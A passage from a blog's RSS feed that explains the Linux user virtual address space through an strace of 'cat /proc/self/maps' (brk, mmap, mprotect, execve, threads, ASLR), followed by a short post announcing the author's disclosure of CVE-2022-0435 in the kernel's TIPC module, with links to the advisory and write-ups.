openat(AT_FDCWD, &quot;/proc/self/maps&quot;, O_RDONLY) = 3
newfstatat(3, &quot;&quot;, {st_mode=S_IFREG|0444, st_size=0, ...}, AT_EMPTY_PATH) = 0
fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bd9000
read(3, &quot;5622ec6c9000-5622ec6cb000 r--p 0&quot;..., 131072) = 2153
write(1, &quot;5622ec6c9000-5622ec6cb000 r--p 0&quot;..., 21535622ec6c9000-5622ec6cb000 r--p 00000000 00:19 868257                     /usr/bin/cat
5622ec6cb000-5622ec6d0000 r-xp 00002000 00:19 868257                     /usr/bin/cat
5622ec6d0000-5622ec6d3000 r--p 00007000 00:19 868257                     /usr/bin/cat
5622ec6d3000-5622ec6d4000 r--p 00009000 00:19 868257                     /usr/bin/cat
5622ec6d4000-5622ec6d5000 rw-p 0000a000 00:19 868257                     /usr/bin/cat
5622ee613000-5622ee634000 rw-p 00000000 00:00 0                          [heap]
7fa1296d4000-7fa1299be000 r--p 00000000 00:19 2289972                    /usr/lib/locale/locale-archive
7fa1299be000-7fa1299c1000 rw-p 00000000 00:00 0 
7fa1299c1000-7fa1299ed000 r--p 00000000 00:19 2289282                    /usr/lib/libc.so.6
7fa1299ed000-7fa129b63000 r-xp 0002c000 00:19 2289282                    /usr/lib/libc.so.6
7fa129b63000-7fa129bb7000 r--p 001a2000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bb7000-7fa129bb8000 ---p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bb8000-7fa129bbb000 r--p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bbb000-7fa129bbe000 rw-p 001f9000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bbe000-7fa129bcd000 rw-p 00000000 00:00 0 
7fa129bd9000-7fa129bfb000 rw-p 00000000 00:00 0 
7fa129bfb000-7fa129bfd000 r--p 00000000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129bfd000-7fa129c24000 r-xp 00002000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129c24000-7fa129c2f000 r--p 00029000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129c30000-7fa129c32000 r--p 00034000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129c32000-7fa129c34000 rw-p 00036000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7ffe5d517000-7ffe5d538000 rw-p 00000000 00:00 0                          [stack]
7ffe5d5c7000-7ffe5d5cb000 r--p 00000000 00:00 0                          [vvar]
7ffe5d5cb000-7ffe5d5cd000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
) = 2153
read(3, &quot;&quot;, 131072)                     = 0
munmap(0x7fa129bd9000, 139264)          = 0
close(3)                                = 0
close(1)                                = 0
close(2)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++</code></pre><p>As we mentioned last time, there&apos;s <strong>a lot going on here</strong> for a program we expect to just be doing the equivalent of <code>read(/proc/self/maps)</code> and <code>write(stdout</code>. In fact, on <strong>line 47</strong> &amp; <strong>48</strong> we can see just that happening. So what&apos;s up with the rest?</p><p>I&apos;m thinking it might be out-of-scope for this post to do a line-by-line breakdown (maybe a more specific post about ELFs and processes and stuff?), but let&apos;s highlight some of the main syscalls used for setting up our memory mapping:</p><h4 id="brk">brk()</h4><p>The <code>brk()</code> syscall is used to adjust the location of the &quot;program break&quot;, which defines the end of the process&apos;s data segment (aka end of the heap). </p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2753;</div><div class="kg-callout-text"><code>void *brk(void *addr);</code></div></div><p><code>brk(NULL)</code> makes no adjustment, so returns the current program break. We can see this on <strong>line 3</strong>, which is likely called during initialisation to figure out where the current heap ends, for memory management libs like malloc.</p><p>Later on <strong>line 37</strong> we can see another call to <code>brk()</code>, asking to extend the program break to <code>0x5622ee634000</code>. If we take a look at the <code>maps</code> output on <strong>line 53</strong>, we can in fact see the heap does end at <code>0x5622ee634000</code> now! Sweet :)</p><h4 id="mmap">mmap()</h4><p>This is the big gun, responsible for the fabled &quot;mappings&quot; we&apos;ve been yapping on about. The <code>mmap()</code> syscall is used to create memory mappings (and <code>munmap()</code> for unmapping them). For more info on args and more, don&apos;t forget to console <code>man 2 mmap</code>.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2753;</div><div class="kg-callout-text"><code>void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);</code></div></div><p>Remember, we can use <code>mmap()</code> to either map a file or device to virtual memory or simply to allocate a black region of memory to a virtual address:</p><ul><li>On <strong>line 10</strong> we <code>openat()</code> our libc, identified by file descriptor 3. Then in <strong>lines 18-22</strong> we can see we make a series of <code>mmap()</code>&apos;s with the fd arg set to 3; we can then cross-reference the permissions (e.g. <code>PROT_READ|PROT_WRITE</code>) and return addresses with the libc mappings we can see in our <code>maps</code> output on <strong>lines 56-61</strong></li><li>Conversely we can see some anonymous mappings, where the fd is set to <code>-1</code> and <code>mmap()</code> is passed the flag <code>MAP_ANONYMOUS</code>, &#xA0;like &#xA0;<strong>line 46 </strong><sup>[2]</sup></li></ul><h4 id="mprotect">mprotect()</h4><p>If &#xA0;<code>mmap()</code> is the big gun, then <code>mprotect()</code> is the syscall used set the protections for a mapped region of memory (yeah, I couldn&apos;t think of an analogy okay). &#xA0;Typically these protections may be any combination of read, write and execute access flags. </p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2753;</div><div class="kg-callout-text"><code>int mprotect(void *addr, size_t len, int prot);</code></div></div><p>While we can include protection flags via the <code>prot</code> &#xA0;arg for <code>mmap()</code>, <code>mprotect()</code> allows us to set page granular access flags which we can update with each call, without having to map new regions of memory each time.</p><h4 id="execve">execve()</h4><p>Some of you might have noticed that while we can see regions being mapped for locale-archive, libc; what happened to <code>/usr/bin/cat</code> itself? Again, trying to keep within scope of virtual memory, this setup is handled by the initial <code>execve()</code> system call on <strong>line 1</strong>.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2753;</div><div class="kg-callout-text"><code>int execve(const char *pathname, char *const argv[], char *const envp[]);</code></div></div><p>When a new processes is forked (created), execve() then &quot;executes the program referred to by <code>pathname</code>&quot; <sup>[3]</sup>. This initial call to <code>execve()</code> parses our ELF file <code>/usr/bin/cat</code> and initialises the necessary segments (e.g. text, stack, heap and &#xA0;data). </p><p>It&apos;s worth noting that when a process is created, it is done via <code>fork()</code>, which creates a new process by duplicating the calling process. However, <code>execve()</code> will create a new and empty virtual address space for the application at <code>pathname</code>. </p><hr><ol><li>A deep dive on syscalls is out of scope for this talk, but I might touch on it down the line. In the meantime, <code>man</code> pages are your friend, try <code>man syscalls</code> :) &#xA0;</li><li>Honestly, without digging some more not 100% sure what these are being used for, though likely for something by the shared libs - exercise for the reader? :P </li><li>Surprise, surprise this is from <code>man 2 execve</code>! </li></ol><h3 id="threads">Threads</h3><p>So, we&apos;ve talked a lot about how are usermode processes live in happy isolation within the sandboxed virtual address spaces. Is this <strong><em>always </em></strong>the case? Nope, and one reason is threads.</p><p>Threads are essentially light-weight processes and represent a flow of execution within an application. The reason they&apos;re &quot;light-weight processes&quot; is that when threads are created, instead of using <code>fork()</code> they use a similar system call, <code>clone()</code>. </p><p><code>clone()</code> is also used to create a process, but allows more control over what resources are shared between the caller and callee. As a result, in Linux, threads <strong><em>share</em></strong> the same virtual address space and mappings but have separate heap &amp; stack mappings.</p><h3 id="aslr">ASLR</h3><p>Some of you eager enough to run these commands multiple times may have noticed that the addresses for your mappings change each time you run <code>cat</code>, what gives?</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/confused_girl.gif" class="kg-image" alt="Linternals: The User Virtual Address Space" loading="lazy" width="400" height="182"></figure><p>Without deviating too off-topic, this is actually normal! It&apos;d be more concerning if nothing changed, as this is the result of a mitigation called ASLR: Address Space Layout Randomisation <sup>[1]</sup>.</p><p>ASLR does exactly what it says on the tin, randomising by default the virtual addresses that the stack, heap and shared libraries are mapped to each time the program is run. This helps mitigate exploitation techniques that rely on knowing where stuff is in memory!</p><p>Modern compilers are also able to compile code as &quot;position independent&quot; <sup>[2]</sup>, which tl;dr means we can also randomise the virtual address of the executable code as well! Pretty neat :) </p><p>Of course, I&apos;d be remiss if I didn&apos;t mention there&apos;s a procfs file to check whether ASLR is currently enabled: <code>cat /proc/sys/kernel/randomize_va_space</code> <sup>[3]</sup></p><hr><ol><li><a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization">https://en.wikipedia.org/wiki/Address_space_layout_randomization</a></li><li><a href="https://en.wikipedia.org/wiki/Position-independent_code#:~:text=In%20computing,%20position-independent%20code,regardless%20of%20its%20absolute%20address">https://en.wikipedia.org/wiki/Position-independent_code</a></li><li><a href="https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/">https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/</a></li></ol><h3 id="wrapping-up-in-uvas">Wrapping Up In UVAS</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/we_did_it.gif" class="kg-image" alt="Linternals: The User Virtual Address Space" loading="lazy" width="480" height="260"></figure><p>And there we have it! Hopefully this has provided a high level overview of the user virtual address space, we&apos;ve covered:</p><ul><li>That the virtual address space is split up into two sections, the lower half being the unprivileged user virtual address space (UVAS)</li><li>Userspace is limited in what it can do, but can ask the kernel to perform privileged actions on its behalf via the system call interface</li><li>We looked at what a typical application, <code>cat</code>, uses the UVAS for: loading and mapping the code and data into memory, allocating memory for the heap and stack as well as mapping in library files such as libc and locale information</li><li>Next we took a brief look at the system calls that userspace applications can use to get the kernel to setup their virtual address space</li></ul><h2 id="next-time">Next Time!</h2><p>Can you believe I planned to wrap everything up in this post? Of course I did, whoops! Suffice to say, we still have a lot to cover in an indeterminate number of posts! </p><p>Coming up we&apos;ll context switch and take a closer look at what goes in in the kernel virtual address space and how it&apos;s mapped. After that, we&apos;ll get technical as we figure out how all this is implemented via the kernel and hardware features.</p><p>Thanks for reading!</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel]]></title><description><![CDATA[Recently I discovered a vulnerability in the Linux kernel that's been lurking there since 4.8 (July 2016)! CVE-2022-0435 is a remotely and locally exploitable stack overflow in the TIPC networking module of the Linux kernel]]></description><link>https://sam4k.com/cve-2022-0435-a-remote-stack-overflow-in-the-linux-kernel/</link><guid isPermaLink="false">620c2d361b5b6d052837b0c7</guid><category><![CDATA[linux]]></category><category><![CDATA[security]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Tue, 15 Feb 2022 23:00:00 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/02/what.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/02/what.gif" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"><p>My last post, a <a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">guide on disclosing Linux kernel vulns</a>, might have been a bit of a giveaway, but recently I discovered a vulnerability in the Linux kernel that&apos;s been lurking there since 4.8 (July 2016)!</p><p>Now that the embargo is up, I can share it with the world! <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0435">CVE-2022-0435</a> is a remotely and locally exploitable stack overflow in the TIPC networking module of the Linux kernel (don&apos;t worry, if you haven&apos;t heard of TIPC, it probably isn&apos;t loaded by default on your distro). </p><h2 id="find-out-more">Find Out More</h2><p>If you want a <strong>brief technical overview</strong> of the vulnerability, check out the advisory I posted to the oss-security mailing list:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://seclists.org/oss-sec/2022/q1/130"><div class="kg-bookmark-content"><div class="kg-bookmark-title">oss-sec: CVE-2022-0435: Remote Stack Overflow in Linux Kernel TIPC Module since 4.8 (net/tipc)</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://seclists.org/shared/images/tiny-eyeicon.png" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"></div></div><div class="kg-bookmark-thumbnail"><img src="http://seclists.org/images/oss-sec-img.png" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"></div></a></figure><p>For a more <strong>detailed analysis</strong> of the vulnerability, covering the same content as the advisory, check out my blog post over on the Immunity blog:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://web.archive.org/web/20240330111237/https://blog.immunityinc.com/p/a-remote-stack-overflow-in-the-linux-kernel/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel</div><div class="kg-bookmark-description">CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel Appgate Threat Advisory Services (CANVAS) discovered a vulnerability, where local or remote exploitation can lead to denial of service and code execution. Read more on the discovery and how to remediate.Summary Appgate Threat Advisory Serv&#x2026;</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://web.archive.org/web/20240330111237im_/https://blog.immunityinc.com/p/a-remote-stack-overflow-in-the-linux-kernel/favicon.ico" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"><span class="kg-bookmark-author">Immunity Inc. Blog</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://web.archive.org/_static/images/toolbar/wayback-toolbar-logo-200.png" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"></div></a></figure><p>Focusing more on exploitation, I discuss the work and techniques involved in writing a contemporary remote kernel exploit, using CVE-2022-0435 as a case-study:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://web.archive.org/web/20240330065352/https://blog.immunityinc.com/p/writing-a-linux-kernel-remote-in-2022/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Writing a Linux Kernel Remote in 2022</div><div class="kg-bookmark-description">Writing a Linux Kernel Remote in 2022 In this blog, we examine what goes into remotely exploiting the Linux kernel in 2022, highlighting the main hurdles as well as the differences and similarities with local exploitation.Overview At Appgate Threat Advisory Services, we focus on offensive security&#x2026;</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://web.archive.org/web/20240330065352im_/https://blog.immunityinc.com/p/writing-a-linux-kernel-remote-in-2022/favicon.ico" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"><span class="kg-bookmark-author">Immunity Inc. Blog</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://web.archive.org/web/20240330065352im_/https://blog.immunityinc.com/img/linux_contexts.png" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"></div></a></figure><h2 id="get-in-touch">Get in Touch!</h2><p>General reminder that if you have any questions / corrections / suggestions / request for content, regarding CVE-2022-0435 or any of my Linuxy security-y stuff, feel free to @ me on <a href="https://twitter.com/sam4k1">Twitter</a>!</p><p>exit(0);</p>]]></content:encoded></item></channel></rss>